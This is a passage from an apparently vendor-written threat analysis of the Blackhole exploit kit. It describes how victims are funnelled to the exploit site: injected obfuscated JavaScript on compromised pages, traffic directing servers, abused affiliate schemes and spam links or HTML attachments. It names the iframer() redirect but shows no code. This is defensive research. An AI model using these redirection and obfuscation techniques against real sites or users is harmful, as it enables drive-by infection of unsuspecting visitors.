Exploring the Blackhole exploit kit

In this section I will describe how the kit works in terms of web traffic flow, in order to describe the sequential loading of exploit content before the user is infected with the payload.

2.3.1 Controlling user web traffic

As with all attacks using exploit kits, the first requirement is for the attacker to guide the user’s browser to the exploit site. There are several ways in which this can be achieved. The following two techniques are used by Blackhole:

Compromised web pages. The attackers compromise legitimate web sites/servers so that web pages served include malicious code. When users browse these pages, the malicious code silently loads content from the exploit site. This technique has been used aggressively by Blackhole, with hundreds of thousands of legitimate sites compromised.

Web pages on compromised sites are typically injected with malicious JavaScript. In some cases, simple HTML iframe elements have been used, but JavaScript is preferred since it provides more opportunities for the attackers to hide the malicious code that is injected into the page.

The injected scripts are normally heavily obfuscated, and use a variety of techniques to evade detection. An example compromised page is shown in Figure 3, with the injected script clearly visible at the start of the page. The obfuscation techniques are discussed in more detail in Section 3.

A number of injected JavaScript redirects synonymous with Blackhole have been seen in high volume over the past year. From a Sophos threat name perspective, these include:

Mal/Iframe-V

Mal/Iframe-W

Mal/Iframe-X

Mal/Iframe-Y

Often the injected redirects do not link directly to the Blackhole exploit site. Instead they reference a remote server from where the request is bounced (HTTP 30x redirection) to the exploit site. This approach is probably favoured since it allows user traffic to be sold as a commodity. The server used is often referred to as a Traffic Directing Server (TDS). This may explain why some of these redirects have been seen leading to other exploit kits, not just Blackhole.

Figure 3: Snippet of code from a web page compromised for Blackhole redirection. The heavily obfuscated script injected into the page is blocked by Sophos as Mal/Iframe-W.

The payload of the injected script from Figure 3 is a simple iframe, as shown in Figure 4.

Figure 4: Deobfuscated redirection script from Figure 3 revealing the characteristic function iframer() payload (in this case to a server which bounces the request to the exploit site).

Of course there are a myriad of ways in which user traffic can be controlled. Sometimes sites do not have to be compromised at all. Recently it was reported that affiliate schemes are abused in order to redirect users to Blackhole. In these attacks, webmasters are willingly adding links to third-party code in order that they receive payment (1 dollar for every 1000 page loads). The fly in the ointment was that some of the unsuspecting users were subsequently getting redirected to Blackhole.

Spam messages. Despite years of user education warning of the dangers of links or attachments in email messages, spam continues to be a useful tool for attackers to trick users. Figure 5 shows two spam messages that illustrate the typical ways in which spam is used for tricking users into browsing to Blackhole exploit sites.

The first example (Figure 5a) uses a simple URL link within the email message. The linked page (normally hosted on a compromised site) loads simple JavaScript content to redirect to the Blackhole site. This redirect is normally achieved via a single-line document.location= or window.location= statement.

The second example (Figure 5b) shows an email message containing a HTML attachment. The usual flavours of social engineering are used to entice the recipient into opening up the attachment.

The obfuscation techniques used in these HTML attachments are consistent with that used in the JavaScript injected into compromised sites (see above). In fact, the scripts are essentially the same – once deobfuscated the same function iframer() redirection payload is evident.